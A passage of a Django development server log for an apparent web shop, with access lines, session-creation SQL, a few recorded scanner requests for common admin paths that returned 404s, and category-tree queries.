'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 22, 13, 49, 58, 458459, tzinfo=)) [08/Dec/2019 13:49:58] "GET /login/?next=/ HTTP/1.0" 200 1786 [08/Dec/2019 13:50:46] "GET / HTTP/1.0" 302 0 [08/Dec/2019 13:56:33] "GET / HTTP/1.0" 302 0 [08/Dec/2019 14:05:02] "GET / HTTP/1.0" 302 0 [08/Dec/2019 14:11:46] "GET / HTTP/1.0" 302 0 [08/Dec/2019 14:16:49] "GET / HTTP/1.0" 302 0 [08/Dec/2019 14:21:51] "GET / HTTP/1.0" 302 0 [08/Dec/2019 14:29:51] "GET / HTTP/1.0" 302 0 [08/Dec/2019 14:34:54] "GET / HTTP/1.0" 302 0 [08/Dec/2019 14:39:56] "GET / HTTP/1.0" 302 0 [08/Dec/2019 14:45:00] "GET / HTTP/1.0" 302 0 [08/Dec/2019 14:50:02] "GET / HTTP/1.0" 302 0 [08/Dec/2019 14:55:53] "GET / HTTP/1.0" 302 0 [08/Dec/2019 15:05:02] "GET / HTTP/1.0" 302 0 [08/Dec/2019 15:10:05] "GET / HTTP/1.0" 302 0 [08/Dec/2019 15:15:08] "GET / HTTP/1.0" 302 0 [08/Dec/2019 15:20:10] "GET / HTTP/1.0" 302 0 [08/Dec/2019 15:29:41] "GET / HTTP/1.0" 302 0 [08/Dec/2019 15:34:44] "GET / HTTP/1.0" 302 0 [08/Dec/2019 15:39:46] "GET / HTTP/1.0" 302 0 [08/Dec/2019 15:44:49] "GET / HTTP/1.0" 302 0 [08/Dec/2019 15:49:52] "GET / HTTP/1.0" 302 0 [08/Dec/2019 15:54:55] "GET / HTTP/1.0" 302 0 [08/Dec/2019 15:59:57] "GET / HTTP/1.0" 302 0 [08/Dec/2019 16:05:02] "GET / HTTP/1.0" 302 0 [08/Dec/2019 16:11:08] "GET / HTTP/1.0" 302 0 [08/Dec/2019 16:12:09] "GET / HTTP/1.0" 302 0 [08/Dec/2019 16:16:30] "GET / HTTP/1.0" 302 0 [08/Dec/2019 16:17:12] "GET / HTTP/1.0" 302 0 [08/Dec/2019 16:22:14] "GET / HTTP/1.0" 302 0 [08/Dec/2019 16:27:17] "GET / HTTP/1.0" 302 0 [08/Dec/2019 16:32:20] "GET / HTTP/1.0" 302 0 [08/Dec/2019 16:34:10] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-08 16:34:11,474 utils 32196 139885061072640 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'm2qu8h2i811sspx9kxpl6xgc9gu2uir4' LIMIT 1; args=('m2qu8h2i811sspx9kxpl6xgc9gu2uir4',) DEBUG 2019-12-08 16:34:11,476 utils 32196 139885061072640 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('m2qu8h2i811sspx9kxpl6xgc9gu2uir4', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-22T16:34:11.475194+00:00'::timestamptz); args=('m2qu8h2i811sspx9kxpl6xgc9gu2uir4', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 22, 16, 34, 11, 475194, tzinfo=)) [08/Dec/2019 16:34:11] "GET /login/?next=/ HTTP/1.0" 200 1786 [08/Dec/2019 16:37:22] "GET / HTTP/1.0" 302 0 [08/Dec/2019 16:42:25] "GET / HTTP/1.0" 302 0 [08/Dec/2019 16:47:37] "GET / HTTP/1.0" 302 0 [08/Dec/2019 16:52:39] "GET / HTTP/1.0" 302 0 [08/Dec/2019 16:57:42] "GET / HTTP/1.0" 302 0 [08/Dec/2019 17:05:03] "GET / HTTP/1.0" 302 0 [08/Dec/2019 17:10:05] "GET / HTTP/1.0" 302 0 [08/Dec/2019 17:11:57] "GET / HTTP/1.0" 302 0 [08/Dec/2019 17:15:08] "GET / HTTP/1.0" 302 0 [08/Dec/2019 17:20:10] "GET / HTTP/1.0" 302 0 [08/Dec/2019 17:28:09] "GET / HTTP/1.0" 302 0 [08/Dec/2019 17:33:12] "GET / HTTP/1.0" 302 0 [08/Dec/2019 17:38:14] "GET / HTTP/1.0" 302 0 [08/Dec/2019 17:43:17] "GET / HTTP/1.0" 302 0 [08/Dec/2019 17:48:19] "GET / HTTP/1.0" 302 0 [08/Dec/2019 17:55:54] "GET / HTTP/1.0" 302 0 [08/Dec/2019 18:05:03] "GET / HTTP/1.0" 302 0 [08/Dec/2019 18:09:18] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-08 18:09:19,069 utils 32196 139885061072640 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'bfx3itek9nzvb8rh29lefrqa059cm7f2' LIMIT 1; args=('bfx3itek9nzvb8rh29lefrqa059cm7f2',) DEBUG 2019-12-08 18:09:19,071 utils 32196 139885061072640 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('bfx3itek9nzvb8rh29lefrqa059cm7f2', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-22T18:09:19.070260+00:00'::timestamptz); args=('bfx3itek9nzvb8rh29lefrqa059cm7f2', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 22, 18, 9, 19, 70260, tzinfo=)) [08/Dec/2019 18:09:19] "GET /login/?next=/ HTTP/1.0" 200 1786 [08/Dec/2019 18:12:31] "GET / HTTP/1.0" 302 0 [08/Dec/2019 18:16:26] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-08 18:16:26,262 utils 32196 139885061072640 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'f8lnf7qsr15wslyufjash85kj3nwksz9' LIMIT 1; args=('f8lnf7qsr15wslyufjash85kj3nwksz9',) DEBUG 2019-12-08 18:16:26,263 utils 32196 139885061072640 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('f8lnf7qsr15wslyufjash85kj3nwksz9', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-22T18:16:26.262541+00:00'::timestamptz); args=('f8lnf7qsr15wslyufjash85kj3nwksz9', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 22, 18, 16, 26, 262541, tzinfo=)) [08/Dec/2019 18:16:26] "GET /login/?next=/ HTTP/1.0" 200 1786 [08/Dec/2019 18:17:34] "GET / HTTP/1.0" 302 0 [08/Dec/2019 18:19:59] "GET /static/admin/css/responsive.css HTTP/1.0" 200 17944 [08/Dec/2019 18:22:36] "GET / HTTP/1.0" 302 0 [08/Dec/2019 18:25:01] "GET /whm-server-status HTTP/1.0" 301 0 [08/Dec/2019 18:27:26] "GET / HTTP/1.0" 302 0 [08/Dec/2019 18:27:39] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [08/Dec/2019 18:30:22] "GET /robots.txt HTTP/1.0" 404 6624 [08/Dec/2019 18:32:41] "GET / HTTP/1.0" 302 0 [08/Dec/2019 18:39:20] "GET / HTTP/1.0" 302 0 [08/Dec/2019 18:43:13] "GET /static/admin/css/base.css HTTP/1.0" 200 16378 [08/Dec/2019 18:43:13] "GET /static/admin/css/login.css HTTP/1.0" 200 1233 [08/Dec/2019 18:44:22] "GET / HTTP/1.0" 302 0 [08/Dec/2019 18:49:25] "GET / HTTP/1.0" 302 0 [08/Dec/2019 18:54:28] "GET / HTTP/1.0" 302 0 [08/Dec/2019 18:59:30] "GET / HTTP/1.0" 302 0 [08/Dec/2019 19:05:03] "GET / HTTP/1.0" 302 0 [08/Dec/2019 19:10:30] "GET / HTTP/1.0" 302 0 [08/Dec/2019 19:15:33] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [08/Dec/2019 19:20:09] "GET /robots.txt HTTP/1.0" 404 6624 Not Found: /robots.txt [08/Dec/2019 19:20:09] "GET /robots.txt HTTP/1.0" 404 6624 Not Found: /robots.txt [08/Dec/2019 19:20:09] "GET /robots.txt HTTP/1.0" 404 6624 Not Found: /robots.txt [08/Dec/2019 19:20:09] "GET /robots.txt HTTP/1.0" 404 6624 [08/Dec/2019 19:20:14] "GET /static/admin/css/fonts.css HTTP/1.0" 200 423 [08/Dec/2019 19:20:35] "GET / HTTP/1.0" 302 0 [08/Dec/2019 19:25:38] "GET / HTTP/1.0" 302 0 [08/Dec/2019 19:30:41] "GET / HTTP/1.0" 302 0 [08/Dec/2019 19:34:10] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-08 19:34:11,469 utils 32196 139885061072640 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'kd804ig92j63qdgwhjpm4oq4jcfd71tz' LIMIT 1; args=('kd804ig92j63qdgwhjpm4oq4jcfd71tz',) DEBUG 2019-12-08 19:34:11,470 utils 32196 139885061072640 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('kd804ig92j63qdgwhjpm4oq4jcfd71tz', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-22T19:34:11.469472+00:00'::timestamptz); args=('kd804ig92j63qdgwhjpm4oq4jcfd71tz', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 22, 19, 34, 11, 469472, tzinfo=)) [08/Dec/2019 19:34:11] "GET /login/?next=/ HTTP/1.0" 200 1786 [08/Dec/2019 19:35:01] "GET /whm-server-status HTTP/1.0" 301 0 [08/Dec/2019 19:35:43] "GET / HTTP/1.0" 302 0 [08/Dec/2019 19:40:45] "GET / HTTP/1.0" 302 0 [08/Dec/2019 19:45:48] "GET / HTTP/1.0" 302 0 [08/Dec/2019 19:50:51] "GET / HTTP/1.0" 302 0 [08/Dec/2019 19:55:53] "GET / HTTP/1.0" 302 0 [08/Dec/2019 20:05:03] "GET / HTTP/1.0" 302 0 [08/Dec/2019 20:12:38] "GET / HTTP/1.0" 302 0 [08/Dec/2019 20:13:58] "GET / HTTP/1.0" 302 0 [08/Dec/2019 20:17:41] "GET / HTTP/1.0" 302 0 [08/Dec/2019 20:22:43] "GET / HTTP/1.0" 302 0 [08/Dec/2019 20:24:07] "GET / HTTP/1.0" 302 0 [08/Dec/2019 20:31:06] "GET / HTTP/1.0" 302 0 [08/Dec/2019 20:36:08] "GET / HTTP/1.0" 302 0 [08/Dec/2019 20:41:11] "GET / HTTP/1.0" 302 0 [08/Dec/2019 20:46:13] "GET / HTTP/1.0" 302 0 [08/Dec/2019 20:51:16] "GET / HTTP/1.0" 302 0 [08/Dec/2019 20:56:19] "GET / HTTP/1.0" 302 0 [08/Dec/2019 21:05:03] "GET / HTTP/1.0" 302 0 [08/Dec/2019 21:10:05] "GET / HTTP/1.0" 302 0 [08/Dec/2019 21:15:08] "GET / HTTP/1.0" 302 0 [08/Dec/2019 21:20:11] "GET / HTTP/1.0" 302 0 [08/Dec/2019 21:25:14] "GET / HTTP/1.0" 302 0 [08/Dec/2019 21:30:16] "GET / HTTP/1.0" 302 0 [08/Dec/2019 21:35:19] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [08/Dec/2019 21:39:31] "GET /robots.txt HTTP/1.0" 404 6626 [08/Dec/2019 21:39:40] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-08 21:39:43,685 utils 32196 139885061072640 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'mlwtwo0ommmdhm67ejlemw3cshjgfzso' LIMIT 1; args=('mlwtwo0ommmdhm67ejlemw3cshjgfzso',) DEBUG 2019-12-08 21:39:43,688 utils 32196 139885061072640 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('mlwtwo0ommmdhm67ejlemw3cshjgfzso', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-22T21:39:43.686617+00:00'::timestamptz); args=('mlwtwo0ommmdhm67ejlemw3cshjgfzso', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 22, 21, 39, 43, 686617, tzinfo=)) [08/Dec/2019 21:39:43] "GET /login/?next=/ HTTP/1.0" 200 1786 [08/Dec/2019 21:40:22] "GET / HTTP/1.0" 302 0 [08/Dec/2019 21:45:24] "GET / HTTP/1.0" 302 0 [08/Dec/2019 21:51:08] "GET / HTTP/1.0" 302 0 [08/Dec/2019 21:56:11] "GET / HTTP/1.0" 302 0 [08/Dec/2019 22:05:03] "GET / HTTP/1.0" 302 0 [08/Dec/2019 22:10:05] "GET / HTTP/1.0" 302 0 [08/Dec/2019 22:15:08] "GET / HTTP/1.0" 302 0 [08/Dec/2019 22:20:11] "GET / HTTP/1.0" 302 0 [08/Dec/2019 22:25:14] "GET / HTTP/1.0" 302 0 [08/Dec/2019 22:30:17] "GET / HTTP/1.0" 302 0 [08/Dec/2019 22:34:10] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-08 22:34:11,382 utils 32196 139885061072640 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'dwi3gl21hfokrrgq9vc2ypv8f343ym9x' LIMIT 1; args=('dwi3gl21hfokrrgq9vc2ypv8f343ym9x',) DEBUG 2019-12-08 22:34:11,383 utils 32196 139885061072640 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('dwi3gl21hfokrrgq9vc2ypv8f343ym9x', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-22T22:34:11.382429+00:00'::timestamptz); args=('dwi3gl21hfokrrgq9vc2ypv8f343ym9x', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 22, 22, 34, 11, 382429, tzinfo=)) [08/Dec/2019 22:34:11] "GET /login/?next=/ HTTP/1.0" 200 1786 [08/Dec/2019 22:35:20] "GET / HTTP/1.0" 302 0 [08/Dec/2019 22:40:23] "GET / HTTP/1.0" 302 0 [08/Dec/2019 22:45:26] "GET / HTTP/1.0" 302 0 [08/Dec/2019 22:50:30] "GET / HTTP/1.0" 302 0 [08/Dec/2019 22:55:32] "GET / HTTP/1.0" 302 0 [08/Dec/2019 23:05:02] "GET / HTTP/1.0" 302 0 [08/Dec/2019 23:10:05] "GET / HTTP/1.0" 302 0 [08/Dec/2019 23:15:08] "GET / HTTP/1.0" 302 0 [08/Dec/2019 23:21:02] "GET / HTTP/1.0" 302 0 [08/Dec/2019 23:29:32] "GET / HTTP/1.0" 302 0 [08/Dec/2019 23:34:35] "GET / HTTP/1.0" 302 0 [08/Dec/2019 23:39:38] "GET / HTTP/1.0" 302 0 [08/Dec/2019 23:44:40] "GET / HTTP/1.0" 302 0 [08/Dec/2019 23:49:43] "GET / HTTP/1.0" 302 0 Not Found: /manager/text/list [08/Dec/2019 23:53:46] "GET /manager/text/list HTTP/1.0" 404 6644 [08/Dec/2019 23:54:46] "GET / HTTP/1.0" 302 0 [08/Dec/2019 23:59:48] "GET / HTTP/1.0" 302 0 [09/Dec/2019 00:05:03] "GET / HTTP/1.0" 302 0 [09/Dec/2019 00:10:05] "GET / HTTP/1.0" 302 0 [09/Dec/2019 00:15:08] "GET / HTTP/1.0" 302 0 [09/Dec/2019 00:20:11] "GET / HTTP/1.0" 302 0 [09/Dec/2019 00:25:13] "GET / HTTP/1.0" 302 0 [09/Dec/2019 00:30:15] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [09/Dec/2019 00:30:43] "GET /proxy.php HTTP/1.0" 404 6629 [09/Dec/2019 00:35:49] "GET / HTTP/1.0" 302 0 [09/Dec/2019 00:40:52] "GET / HTTP/1.0" 302 0 [09/Dec/2019 00:45:54] "GET / HTTP/1.0" 302 0 [09/Dec/2019 00:55:26] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [09/Dec/2019 01:01:34] "GET /proxy.php HTTP/1.0" 404 6627 [09/Dec/2019 01:02:52] "GET / HTTP/1.0" 302 0 [09/Dec/2019 01:10:58] "GET / HTTP/1.0" 302 0 [09/Dec/2019 01:16:26] "GET / HTTP/1.0" 302 0 [09/Dec/2019 01:21:29] "GET / HTTP/1.0" 302 0 Not Found: /manager/html [09/Dec/2019 01:24:45] "GET /manager/html HTTP/1.0" 404 6629 [09/Dec/2019 01:29:51] "GET / HTTP/1.0" 302 0 [09/Dec/2019 01:34:10] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-09 01:34:11,431 utils 32196 139885061072640 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'uddt2ck76ex99k7kn4gowgzbccd59vrl' LIMIT 1; args=('uddt2ck76ex99k7kn4gowgzbccd59vrl',) DEBUG 2019-12-09 01:34:11,433 utils 32196 139885061072640 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('uddt2ck76ex99k7kn4gowgzbccd59vrl', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-23T01:34:11.432054+00:00'::timestamptz); args=('uddt2ck76ex99k7kn4gowgzbccd59vrl', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 23, 1, 34, 11, 432054, tzinfo=)) [09/Dec/2019 01:34:11] "GET /login/?next=/ HTTP/1.0" 200 1786 [09/Dec/2019 01:35:33] "GET / HTTP/1.0" 302 0 [09/Dec/2019 01:40:36] "GET / HTTP/1.0" 302 0 [09/Dec/2019 01:44:57] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.0" 302 0 DEBUG 2019-12-09 01:44:57,871 utils 32196 139885061072640 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'zchxn17vjstex15iabf1i879yqt15bup' LIMIT 1; args=('zchxn17vjstex15iabf1i879yqt15bup',) DEBUG 2019-12-09 01:44:57,874 utils 32196 139885061072640 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('zchxn17vjstex15iabf1i879yqt15bup', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-23T01:44:57.872069+00:00'::timestamptz); args=('zchxn17vjstex15iabf1i879yqt15bup', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 23, 1, 44, 57, 872069, tzinfo=)) [09/Dec/2019 01:44:57] "GET /login/?next=/%3FXDEBUG_SESSION_START%3Dphpstorm HTTP/1.0" 200 1850 [09/Dec/2019 01:45:39] "GET / HTTP/1.0" 302 0 [09/Dec/2019 01:50:42] "GET / HTTP/1.0" 302 0 [09/Dec/2019 01:55:45] "GET / HTTP/1.0" 302 0 [09/Dec/2019 02:05:02] "GET / HTTP/1.0" 302 0 [09/Dec/2019 02:10:05] "GET / HTTP/1.0" 302 0 [09/Dec/2019 02:18:56] "GET / HTTP/1.0" 302 0 [09/Dec/2019 02:23:59] "GET / HTTP/1.0" 302 0 [09/Dec/2019 02:29:02] "GET / HTTP/1.0" 302 0 [09/Dec/2019 02:37:06] "GET / HTTP/1.0" 302 0 [09/Dec/2019 02:39:29] "GET / HTTP/1.0" 302 0 [09/Dec/2019 02:42:51] "GET / HTTP/1.0" 302 0 [09/Dec/2019 02:48:29] "GET / HTTP/1.0" 302 0 [09/Dec/2019 02:49:00] "GET / HTTP/1.0" 302 0 [09/Dec/2019 02:50:01] "GET /whm-server-status HTTP/1.0" 301 0 [09/Dec/2019 02:55:24] "GET / HTTP/1.0" 302 0 [09/Dec/2019 03:05:03] "GET / HTTP/1.0" 302 0 [09/Dec/2019 03:10:06] "GET / HTTP/1.0" 302 0 [09/Dec/2019 03:15:08] "GET / HTTP/1.0" 302 0 [09/Dec/2019 03:20:11] "GET / HTTP/1.0" 302 0 [09/Dec/2019 03:25:14] "GET / HTTP/1.0" 302 0 [09/Dec/2019 03:30:17] "GET / HTTP/1.0" 302 0 [09/Dec/2019 03:35:19] "GET / HTTP/1.0" 302 0 [09/Dec/2019 03:40:22] "GET / HTTP/1.0" 302 0 [09/Dec/2019 03:45:25] "GET / HTTP/1.0" 302 0 Not Found: /CFIDE/administrator/ [09/Dec/2019 03:48:19] "GET /CFIDE/administrator/ HTTP/1.0" 404 6653 [09/Dec/2019 03:50:28] "GET / HTTP/1.0" 302 0 [09/Dec/2019 03:55:30] "GET / HTTP/1.0" 302 0 [09/Dec/2019 04:05:02] "GET / HTTP/1.0" 302 0 [09/Dec/2019 04:10:05] "GET / HTTP/1.0" 302 0 [09/Dec/2019 04:15:08] "GET / HTTP/1.0" 302 0 [09/Dec/2019 04:20:11] "GET / HTTP/1.0" 302 0 [09/Dec/2019 04:29:16] "GET / HTTP/1.0" 302 0 [09/Dec/2019 04:34:10] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-09 04:34:11,480 utils 32196 139885061072640 (0.005) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '3t2miw290wt1r1e5dd4idekg73ndghpx' LIMIT 1; args=('3t2miw290wt1r1e5dd4idekg73ndghpx',) DEBUG 2019-12-09 04:34:11,483 utils 32196 139885061072640 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('3t2miw290wt1r1e5dd4idekg73ndghpx', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-23T04:34:11.481310+00:00'::timestamptz); args=('3t2miw290wt1r1e5dd4idekg73ndghpx', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 23, 4, 34, 11, 481310, tzinfo=)) [09/Dec/2019 04:34:11] "GET /login/?next=/ HTTP/1.0" 200 1786 [09/Dec/2019 04:34:19] "GET / HTTP/1.0" 302 0 [09/Dec/2019 04:42:42] "GET / HTTP/1.0" 302 0 [09/Dec/2019 04:47:45] "GET / HTTP/1.0" 302 0 [09/Dec/2019 04:52:48] "GET / HTTP/1.0" 302 0 [09/Dec/2019 04:57:17] "GET / HTTP/1.0" 302 0 [09/Dec/2019 04:57:51] "GET / HTTP/1.0" 302 0 [09/Dec/2019 05:00:01] "GET /whm-server-status HTTP/1.0" 301 0 [09/Dec/2019 05:03:49] "GET / HTTP/1.0" 302 0 [09/Dec/2019 05:10:04] "GET / HTTP/1.0" 302 0 [09/Dec/2019 05:15:07] "GET / HTTP/1.0" 302 0 [09/Dec/2019 05:21:52] "GET / HTTP/1.0" 302 0 [09/Dec/2019 05:26:55] "GET / HTTP/1.0" 302 0 [09/Dec/2019 05:31:57] "GET / HTTP/1.0" 302 0 [09/Dec/2019 05:37:00] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [09/Dec/2019 05:38:17] "GET /robots.txt HTTP/1.0" 404 6624 [09/Dec/2019 05:38:18] "GET /?C=N;O=D HTTP/1.0" 302 0 [09/Dec/2019 05:42:02] "GET / HTTP/1.0" 302 0 [09/Dec/2019 05:48:55] "GET / HTTP/1.0" 302 0 Not Found: /index.asp [09/Dec/2019 05:51:23] "GET /index.asp HTTP/1.0" 404 6621 [09/Dec/2019 05:53:22] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-09 05:53:23,926 utils 32196 139885061072640 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '6yts5wq8ut1vwtyoql07z9mrepsry2ip' LIMIT 1; args=('6yts5wq8ut1vwtyoql07z9mrepsry2ip',) DEBUG 2019-12-09 05:53:23,928 utils 32196 139885061072640 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('6yts5wq8ut1vwtyoql07z9mrepsry2ip', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-23T05:53:23.927292+00:00'::timestamptz); args=('6yts5wq8ut1vwtyoql07z9mrepsry2ip', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 23, 5, 53, 23, 927292, tzinfo=)) [09/Dec/2019 05:53:23] "GET /login/?next=/ HTTP/1.0" 200 1786 [09/Dec/2019 05:53:58] "GET / HTTP/1.0" 302 0 [09/Dec/2019 05:59:01] "GET / HTTP/1.0" 302 0 [09/Dec/2019 06:05:03] "GET / HTTP/1.0" 302 0 [09/Dec/2019 06:08:02] "GET / HTTP/1.0" 302 0 [09/Dec/2019 06:10:06] "GET / HTTP/1.0" 302 0 [09/Dec/2019 06:11:29] "GET / HTTP/1.0" 302 0 [09/Dec/2019 06:15:08] "GET / HTTP/1.0" 302 0 [09/Dec/2019 06:16:37] "GET / HTTP/1.0" 302 0 [09/Dec/2019 06:20:11] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-09 06:21:32,016 utils 32196 139885061072640 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-09 06:21:32,023 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-09 06:21:32,026 utils 32196 139885061072640 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-09 06:21:32,028 utils 32196 139885061072640 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-09 06:21:32,030 utils 32196 139885061072640 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-09 06:21:32,033 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-09 06:21:32,035 utils 32196 139885061072640 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-09 06:21:32,037 utils 32196 139885061072640 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-09 06:21:32,040 utils 32196 139885061072640 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", 